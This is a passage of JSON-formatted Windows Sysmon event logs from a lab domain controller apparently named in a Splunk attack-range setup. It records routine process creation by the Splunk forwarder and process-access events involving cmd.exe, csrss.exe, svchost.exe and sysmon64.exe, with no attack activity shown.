06:51:47.970","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-00100F800500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","ParentProcessId":"4432","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nSourceProcessId: 4432\r\nSourceThreadId: 3128\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00100F800500}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","SourceProcessId":"4432","SourceThreadId":"3128","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00100F800500}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00100F800500}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00100F800500}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
